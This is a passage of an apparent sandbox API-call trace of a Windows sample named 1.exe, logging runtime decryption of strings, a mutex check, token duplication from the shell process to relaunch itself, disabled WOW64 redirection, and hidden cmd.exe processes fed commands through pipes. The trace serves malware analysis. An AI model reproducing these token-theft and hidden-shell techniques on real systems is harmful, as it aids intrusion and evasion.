hHeap=0x2a60000) returned 1 [0068.567] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a8f8 | out: hHeap=0x2a60000) returned 1 [0068.568] Sleep (dwMilliseconds=0x3e8) [0069.583] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a778 [0069.583] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf720c0) returned 1 [0069.583] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0069.583] CryptDecrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a778, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a778, pdwDataLen=0x298f9d0) returned 1 [0069.583] CryptDestroyKey (hKey=0xf720c0) returned 1 [0069.583] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a5c0 [0069.583] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a570 [0069.583] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a682d0 [0069.583] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71ec0) returned 1 [0069.583] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0069.583] CryptDecrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a682d0, pdwDataLen=0x298f9a8 | out: pbData=0x2a682d0, pdwDataLen=0x298f9a8) returned 1 [0069.583] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0069.583] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a682d0 | out: hHeap=0x2a60000) returned 1 [0069.583] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a5c0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0069.583] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a570 | out: hHeap=0x2a60000) returned 1 [0069.583] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a778 | out: hHeap=0x2a60000) returned 1 [0069.583] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0069.583] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a5c0 | out: hHeap=0x2a60000) returned 1 [0069.583] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a8b0 [0069.585] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf71b00) returned 1 [0069.585] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0069.585] CryptDecrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a8b0, pdwDataLen=0x298fa04 | out: pbData=0x2a6a8b0, pdwDataLen=0x298fa04) returned 1 [0069.585] CryptDestroyKey (hKey=0xf71b00) returned 1 [0069.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a8f8 [0069.585] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x330 [0069.585] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x0) returned 0x102 [0069.585] CloseHandle (hObject=0x330) returned 1 [0069.585] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a8b0 | out: hHeap=0x2a60000) returned 1 [0069.585] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a8f8 | out: hHeap=0x2a60000) returned 1 [0069.585] Sleep (dwMilliseconds=0x3e8) Thread: id = 4 os_tid = 0x4c4 [0034.482] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a611f0 [0034.482] GetVersion () returned 0x23f00206 [0034.482] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a61408 [0034.482] CryptImportKey (in: hProv=0xf466e8, pbData=0x2b6fd98, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2b6fe00 | out: phKey=0x2b6fe00*=0xf58da8) returned 1 [0034.482] CryptSetKeyParam (hKey=0xf58da8, dwParam=0x1, pbData=0x2b6fde8, dwFlags=0x0) returned 1 [0034.483] CryptDecrypt (in: hKey=0xf58da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61408, pdwDataLen=0x2b6fdb4 | out: pbData=0x2a61408, pdwDataLen=0x2b6fdb4) returned 1 [0034.483] CryptDestroyKey (hKey=0xf58da8) returned 1 [0034.483] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75e90000 [0034.483] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0034.483] Wow64DisableWow64FsRedirection (in: OldValue=0x2b6fe9c | out: OldValue=0x2b6fe9c*=0x0) returned 1 [0034.483] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61408 | out: hHeap=0x2a60000) returned 1 [0034.483] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x761b0000 [0034.483] GetProcAddress (hModule=0x761b0000, lpProcName="CreateProcessWithTokenW") returned 0x761c0c70 [0034.483] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a611f0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0034.483] GetShellWindow () returned 0x100f0 [0034.484] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0x2b6fea4 | out: lpdwProcessId=0x2b6fea4) returned 0x864 [0034.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x860) returned 0x228 [0034.484] OpenProcessToken (in: ProcessHandle=0x228, DesiredAccess=0x2000000, TokenHandle=0x2b6feb0 | out: TokenHandle=0x2b6feb0*=0x22c) returned 1 [0034.484] DuplicateTokenEx (in: hExistingToken=0x22c, dwDesiredAccess=0x2000000, lpTokenAttributes=0x2b6fe90, ImpersonationLevel=0x2, TokenType=0x1, phNewToken=0x2b6feac | out: phNewToken=0x2b6feac*=0x230) returned 1 [0034.484] CreateProcessWithTokenW (in: hToken=0x230, dwLogonFlags=0x0, lpApplicationName="C:\\Users\\FD1HVy\\Desktop\\1.exe", lpCommandLine=0x0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2b6fe3c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2b6fe80 | out: lpCommandLine=0x0, lpProcessInformation=0x2b6fe80*(hProcess=0x26c, hThread=0x270, dwProcessId=0x3a8, dwThreadId=0x4d0)) returned 1 [0034.657] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a61408 [0034.657] CryptImportKey (in: hProv=0xf466e8, pbData=0x2b6fd98, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2b6fe00 | out: phKey=0x2b6fe00*=0xf59228) returned 1 [0034.657] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x2b6fde8, dwFlags=0x0) returned 1 [0034.657] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61408, pdwDataLen=0x2b6fdb4 | out: pbData=0x2a61408, pdwDataLen=0x2b6fdb4) returned 1 [0034.657] CryptDestroyKey (hKey=0xf59228) returned 1 [0034.657] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75e90000 [0034.657] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x75ea6b50 [0034.657] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0034.657] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61408 | out: hHeap=0x2a60000) returned 1 [0034.657] CloseHandle (hObject=0x228) returned 1 [0034.657] CloseHandle (hObject=0x26c) returned 1 [0034.657] CloseHandle (hObject=0x270) returned 1 [0034.657] CloseHandle (hObject=0x22c) returned 1 [0034.657] CloseHandle (hObject=0x230) returned 1 [0034.657] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 Thread: id = 10 os_tid = 0xf84 [0039.528] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61258 [0039.528] CryptImportKey (in: hProv=0xf466e8, pbData=0x2b6fc40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2b6fca8 | out: phKey=0x2b6fca8*=0xf59168) returned 1 [0039.528] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x2b6fc90, dwFlags=0x0) returned 1 [0039.528] CryptDecrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x2b6fc5c | out: pbData=0x2a61258, pdwDataLen=0x2b6fc5c) returned 1 [0039.528] CryptDestroyKey (hKey=0xf59168) returned 1 [0039.528] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x14) returned 0x2a61280 [0039.528] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x14) returned 0x2a613e8 [0039.529] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61408 [0039.529] CryptImportKey (in: hProv=0xf466e8, pbData=0x2b6fc18, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2b6fc80 | out: phKey=0x2b6fc80*=0xf58e28) returned 1 [0039.529] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x2b6fc68, dwFlags=0x0) returned 1 [0039.529] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61408, pdwDataLen=0x2b6fc34 | out: pbData=0x2a61408, pdwDataLen=0x2b6fc34) returned 1 [0039.529] CryptDestroyKey (hKey=0xf58e28) returned 1 [0039.529] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61408 | out: hHeap=0x2a60000) returned 1 [0039.529] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x2a61280, nSize=0xa | out: lpDst="") returned 0x1c [0039.529] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a613e8 | out: hHeap=0x2a60000) returned 1 [0039.529] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a61280, Size=0x26) returned 0x2a61280 [0039.529] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x26) returned 0x2a613e8 [0039.529] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61418 [0039.529] CryptImportKey (in: hProv=0xf466e8, pbData=0x2b6fc14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2b6fc7c | out: phKey=0x2b6fc7c*=0xf59228) returned 1 [0039.529] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x2b6fc64, dwFlags=0x0) returned 1 [0039.529] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61418, pdwDataLen=0x2b6fc30 | out: pbData=0x2a61418, pdwDataLen=0x2b6fc30) returned 1 [0039.529] CryptDestroyKey (hKey=0xf59228) returned 1 [0039.529] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61418 | out: hHeap=0x2a60000) returned 1 [0039.529] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x2a61280, nSize=0x13 | out: lpDst="") returned 0x1c [0039.529] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a613e8 | out: hHeap=0x2a60000) returned 1 [0039.529] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a61280, Size=0x4a) returned 0x2a613e8 [0039.529] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a61440 [0039.529] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61498 [0039.529] CryptImportKey (in: hProv=0xf466e8, pbData=0x2b6fc14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2b6fc7c | out: phKey=0x2b6fc7c*=0xf590a8) returned 1 [0039.529] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x2b6fc64, dwFlags=0x0) returned 1 [0039.529] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61498, pdwDataLen=0x2b6fc30 | out: pbData=0x2a61498, pdwDataLen=0x2b6fc30) returned 1 [0039.529] CryptDestroyKey (hKey=0xf590a8) returned 1 [0039.529] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0039.529] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x2a613e8, nSize=0x25 | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0039.529] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61440 | out: hHeap=0x2a60000) returned 1 [0039.529] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.529] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a61258 [0039.529] CryptImportKey (in: hProv=0xf466e8, pbData=0x2b6fc38, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2b6fca0 | out: phKey=0x2b6fca0*=0xf59228) returned 1 [0039.529] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x2b6fc88, dwFlags=0x0) returned 1 [0039.529] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x2b6fc54 | out: pbData=0x2a61258, pdwDataLen=0x2b6fc54) returned 1 [0039.529] CryptDestroyKey (hKey=0xf59228) returned 1 [0039.529] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75e90000 [0039.530] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0039.530] Wow64DisableWow64FsRedirection (in: OldValue=0x2b6fd58 | out: OldValue=0x2b6fd58*=0x0) returned 1 [0039.530] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.530] CreatePipe (in: hReadPipe=0x2b6fd64, hWritePipe=0x2b6fd68, lpPipeAttributes=0x2b6fd40, nSize=0x0 | out: hReadPipe=0x2b6fd64*=0x27c, hWritePipe=0x2b6fd68*=0x280) returned 1 [0039.530] CreatePipe (in: hReadPipe=0x2b6fd60, hWritePipe=0x2b6fd5c, lpPipeAttributes=0x2b6fd40, nSize=0x0 | out: hReadPipe=0x2b6fd60*=0x284, hWritePipe=0x2b6fd5c*=0x288) returned 1 [0039.530] SetHandleInformation (hObject=0x280, dwMask=0x1, dwFlags=0x0) returned 1 [0039.531] SetHandleInformation (hObject=0x284, dwMask=0x1, dwFlags=0x0) returned 1 [0039.531] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2b6fcec*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x27c, hStdOutput=0x288, hStdError=0x288), lpProcessInformation=0x2b6fd30 | out: lpCommandLine=0x0, lpProcessInformation=0x2b6fd30*(hProcess=0x290, hThread=0x28c, dwProcessId=0x4a8, dwThreadId=0xf48)) returned 1 [0039.791] WriteFile (in: hFile=0x280, lpBuffer=0x2a612b8*, nNumberOfBytesToWrite=0xbc, lpNumberOfBytesWritten=0x2b6fd4c, lpOverlapped=0x0 | out: lpBuffer=0x2a612b8*, lpNumberOfBytesWritten=0x2b6fd4c*=0xbc, lpOverlapped=0x0) returned 1 [0039.791] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0xffffffff) Thread: id = 11 os_tid = 0xf78 [0039.541] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61258 [0039.778] CryptImportKey (in: hProv=0xf466e8, pbData=0x2c6f82c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c6f894 | out: phKey=0x2c6f894*=0xf59168) returned 1 [0039.778] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x2c6f87c, dwFlags=0x0) returned 1 [0039.778] CryptDecrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x2c6f848 | out: pbData=0x2a61258, pdwDataLen=0x2c6f848) returned 1 [0039.778] CryptDestroyKey (hKey=0xf59168) returned 1 [0039.779] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x14) returned 0x2a61280 [0039.779] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x14) returned 0x2a61440 [0039.779] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61460 [0039.779] CryptImportKey (in: hProv=0xf466e8, pbData=0x2c6f804, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c6f86c | out: phKey=0x2c6f86c*=0xf58e28) returned 1 [0039.779] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x2c6f854, dwFlags=0x0) returned 1 [0039.779] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61460, pdwDataLen=0x2c6f820 | out: pbData=0x2a61460, pdwDataLen=0x2c6f820) returned 1 [0039.779] CryptDestroyKey (hKey=0xf58e28) returned 1 [0039.779] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61460 | out: hHeap=0x2a60000) returned 1 [0039.779] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x2a61280, nSize=0xa | out: lpDst="") returned 0x1c [0039.779] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61440 | out: hHeap=0x2a60000) returned 1 [0039.779] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a61280, Size=0x26) returned 0x2a61280 [0039.779] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x26) returned 0x2a61440 [0039.779] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61470 [0039.779] CryptImportKey (in: hProv=0xf466e8, pbData=0x2c6f800, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c6f868 | out: phKey=0x2c6f868*=0xf59228) returned 1 [0039.779] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x2c6f850, dwFlags=0x0) returned 1 [0039.779] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61470, pdwDataLen=0x2c6f81c | out: pbData=0x2a61470, pdwDataLen=0x2c6f81c) returned 1 [0039.779] CryptDestroyKey (hKey=0xf59228) returned 1 [0039.779] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61470 | out: hHeap=0x2a60000) returned 1 [0039.779] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x2a61280, nSize=0x13 | out: lpDst="") returned 0x1c [0039.779] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61440 | out: hHeap=0x2a60000) returned 1 [0039.779] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a61280, Size=0x4a) returned 0x2a61440 [0039.779] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a61498 [0039.779] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a643e0 [0039.779] CryptImportKey (in: hProv=0xf466e8, pbData=0x2c6f800, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c6f868 | out: phKey=0x2c6f868*=0xf590a8) returned 1 [0039.779] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x2c6f850, dwFlags=0x0) returned 1 [0039.779] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a643e0, pdwDataLen=0x2c6f81c | out: pbData=0x2a643e0, pdwDataLen=0x2c6f81c) returned 1 [0039.779] CryptDestroyKey (hKey=0xf590a8) returned 1 [0039.779] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a643e0 | out: hHeap=0x2a60000) returned 1 [0039.779] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x2a61440, nSize=0x25 | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0039.779] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0039.779] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.779] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a61258 [0039.779] CryptImportKey (in: hProv=0xf466e8, pbData=0x2c6f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c6f88c | out: phKey=0x2c6f88c*=0xf59228) returned 1 [0039.779] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x2c6f874, dwFlags=0x0) returned 1 [0039.779] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x2c6f840 | out: pbData=0x2a61258, pdwDataLen=0x2c6f840) returned 1 [0039.779] CryptDestroyKey (hKey=0xf59228) returned 1 [0039.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75e90000 [0039.780] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0039.780] Wow64DisableWow64FsRedirection (in: OldValue=0x2c6f944 | out: OldValue=0x2c6f944*=0x0) returned 1 [0039.780] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.780] CreatePipe (in: hReadPipe=0x2c6f950, hWritePipe=0x2c6f954, lpPipeAttributes=0x2c6f92c, nSize=0x0 | out: hReadPipe=0x2c6f950*=0x2a4, hWritePipe=0x2c6f954*=0x2a8) returned 1 [0039.780] CreatePipe (in: hReadPipe=0x2c6f94c, hWritePipe=0x2c6f948, lpPipeAttributes=0x2c6f92c, nSize=0x0 | out: hReadPipe=0x2c6f94c*=0x2ac, hWritePipe=0x2c6f948*=0x2b0) returned 1 [0039.780] SetHandleInformation (hObject=0x2a8, dwMask=0x1, dwFlags=0x0) returned 1 [0039.780] SetHandleInformation (hObject=0x2ac, dwMask=0x1, dwFlags=0x0) returned 1 [0039.780] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2c6f8d8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2a4, hStdOutput=0x2b0, hStdError=0x2b0), lpProcessInformation=0x2c6f91c | out: lpCommandLine=0x0, lpProcessInformation=0x2c6f91c*(hProcess=0x2b8, hThread=0x2b4, dwProcessId=0x3d8, dwThreadId=0xf7c)) returned 1 [0039.788] WriteFile (in: hFile=0x2a8, lpBuffer=0x2a61380*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x2c6f938, lpOverlapped=0x0 | out: lpBuffer=0x2a61380*, lpNumberOfBytesWritten=0x2c6f938*=0x5b, lpOverlapped=0x0) returned 1 [0039.788] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) Thread: id = 26 os_tid = 0x8f4 [0044.777] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x440) returned 0x2a64498 [0044.777] CryptImportKey (in: hProv=0xf466e8, pbData=0x2d6f71c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2d6f784 | out: phKey=0x2d6f784*=0xf58ce8) returned 1 [0044.777] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x2d6f76c, dwFlags=0x0) returned 1 [0044.777] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64498, pdwDataLen=0x2d6f738 | out: pbData=0x2a64498, pdwDataLen=0x2d6f738) returned 1 [0044.777] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.777] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x434) returned 0x2a69768 [0044.777] GetLastError () returned 0x0 [0044.778] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x214) returned 0x2a648e0 [0044.778] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0044.778] GetCurrentThreadId () returned 0x8f4 [0044.778] SetLastError (dwErrCode=0x0) [0044.778] GetLastError () returned 0x0 [0044.778] SetLastError (dwErrCode=0x0) [0044.778] GetLastError () returned 0x0 [0044.778] SetLastError (dwErrCode=0x0) [0044.778] GetLastError () returned 0x0 [0044.778] SetLastError (dwErrCode=0x0) [0044.778] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.779] SetLastError (dwErrCode=0x0) [0044.779] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError 